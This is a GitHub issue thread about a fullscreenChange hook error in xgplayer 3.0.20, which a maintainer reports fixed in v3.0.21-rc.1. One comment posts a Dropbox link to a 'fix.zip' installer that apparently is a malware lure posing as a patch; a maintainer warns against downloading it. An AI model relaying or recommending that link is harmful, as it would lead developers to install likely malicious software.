### ISSUE TITLE
3.0.20版本 全屏状态发生变化前的hook报错

### ISSUE THREAD

**Issue by kangkangBit** [bytedance/xgplayer#1579]
**您使用的西瓜播放器版本是多少？ What version of xgplayer are you using?**
3.0.20

**您使用的操作系统和浏览器分别是？ What OS and browser are you using?**
Chrome 128.0.6613.85

**如何复现问题？ How to reproduce the problem?**
版本升级到3.0.20 下面的方法报错
  player.usePluginHooks('fullscreen', 'fullscreenChange', () => {
    if (isApp) player.isCssfullScreen ? RnPostMessage('fullScree', '0') : RnPostMessage('fullScree', '1')
    return true
  })

**您期望的播放器正常行为是？ What did you expect to happen?**

**实际播放器的表现是？ What actually happened?**

**可填写您所在的公司和相关产品业务，方便我们提供更好的技术支持 You can write your company and product which uses xgplayer,  for helping us provide better technical support.**

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by kangkangBit** [comment]
> 下载 https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 在安装程序菜单中，选择“gcc”。

不能正常访问

**Comment by gemxx** [comment]
@kangkangBit 请不要轻易下载海外网站的zip文件，容易导致资产受损

**Comment by kangkangBit** [comment]
> @kangkangBit请不要轻易下载海外网站的zip文件，容易导致资产丢失

我以为是内部员工  那我这个问题怎么解决 因为监听全屏状态变化事件在RN上失效   只能使用hook

**Comment by gemxx** [comment]
@kangkangBit 是报的这个错误吗？
<img width="1217" alt="image" src="https://github.com/user-attachments/assets/0b138c40-275b-4362-9174-0cf964b84251">

**Comment by kangkangBit** [comment]
> @kangkangBit有人报告这个错误吗？ <img alt="图像" width="1217" src="https://private-user-images.githubusercontent.com/576737/361383688-0b138c40-275b-4362-9174-0cf964b84251.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjQ0OTcsIm5iZiI6MTcyNDY2NDE5NywicGF0aCI6Ii81NzY3MzcvMzYxMzgzNjg4LTBiMTM4YzQwLTI3NWItNDM2Mi05MTc0LTBjZjk2NGI4NDI1MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQwOTIzMTdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jNWU0MjFkZmZhMzVlNTVhNDE1MjNiNDQ0YzJlYWZlMzE2MWZlMWVmYzA2NzNjZjRkZmQ3MGQ1NGIyZmIxZjM5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9._w46TcGDLPy8lYzvIIu8T_84IyrLOeLy5EVjuvRdL58">

![image](https://github.com/user-attachments/assets/441567a5-f3f8-46cd-a7d0-acbc77e4f271)

**Comment by kangkangBit** [comment]
> > @kangkangBit有人报告这个错误吗？<img alt="图像" width="1217" src="https://private-user-images.githubusercontent.com/576737/361383688-0b138c40-275b-4362-9174-0cf964b84251.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjQ0OTcsIm5iZiI6MTcyNDY2NDE5NywicGF0aCI6Ii81NzY3MzcvMzYxMzgzNjg4LTBiMTM4YzQwLTI3NWItNDM2Mi05MTc0LTBjZjk2NGI4NDI1MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQwOTIzMTdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jNWU0MjFkZmZhMzVlNTVhNDE1MjNiNDQ0YzJlYWZlMzE2MWZlMWVmYzA2NzNjZjRkZmQ3MGQ1NGIyZmIxZjM5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9._w46TcGDLPy8lYzvIIu8T_84IyrLOeLy5EVjuvRdL58">
> 
> ![图像](https://private-user-images.githubusercontent.com/93574586/361384372-441567a5-f3f8-46cd-a7d0-acbc77e4f271.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjQ2ODYsIm5iZiI6MTcyNDY2NDM4NiwicGF0aCI6Ii85MzU3NDU4Ni8zNjEzODQzNzItNDQxNTY3YTUtZjNmOC00NmNkLWE3ZDAtYWNiYzc3ZTRmMjcxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA5MjYyNlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWY2YmZhMjhhMmM5NTJmYTA5M2Y5MmM3Y2E5ZDg3MmE0MGU2OGExZThhOGJiNDBhMGU2ZjRlYWEwMTJlOGEyYzgmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.SR0LO0K0qfK97CegLDEl5

**Comment by kangkangBit** [comment]
> > @kangkangBit有人报告这个错误吗？ <img alt="图像" width="1217" src="https://private-user-images.githubusercontent.com/576737/361383688-0b138c40-275b-4362-9174-0cf964b84251.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjQ0OTcsIm5iZiI6MTcyNDY2NDE5NywicGF0aCI6Ii81NzY3MzcvMzYxMzgzNjg4LTBiMTM4YzQwLTI3NWItNDM2Mi05MTc0LTBjZjk2NGI4NDI1MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQwOTIzMTdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jNWU0MjFkZmZhMzVlNTVhNDE1MjNiNDQ0YzJlYWZlMzE2MWZlMWVmYzA2NzNjZjRkZmQ3MGQ1NGIyZmIxZjM5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9._w46TcGDLPy8lYzvIIu8T_84IyrLOeLy5EVjuvRdL58">
> 
> ![image](https://private-user-images.githubusercontent.com/93574586/361384372-441567a5-f3f8-46cd-a7d0-acbc77e4f271.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjQ3NTUsIm5iZiI6MTcyNDY2NDQ1NSwicGF0aCI6Ii85MzU3NDU4Ni8zNjEzODQzNzItNDQxNTY3YTUtZjNmOC00NmNkLWE3ZDAtYWNiYzc3ZTRmMjcxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA5MjczNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI3MjM2NTIwZDJkZTI3MjU3MmVmYjY5ZjlkYzYzZDg5YmM0ZmYyMjUzZDhjYmMzNWY0ZjVlMjE3NDhlZTY0YWImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.ZmnaIwlkRLEVdqbcReWtm4pIiivJa497dvJWa6VywIs)
是3.0.20的bug吗

**Comment by gemxx** [comment]
于 v3.0.21-rc.1 已解决，修复见：https://github.com/bytedance/xgplayer/commit/cbf9ae5dd5a29ec07ce17284bfea3e8a3413142a
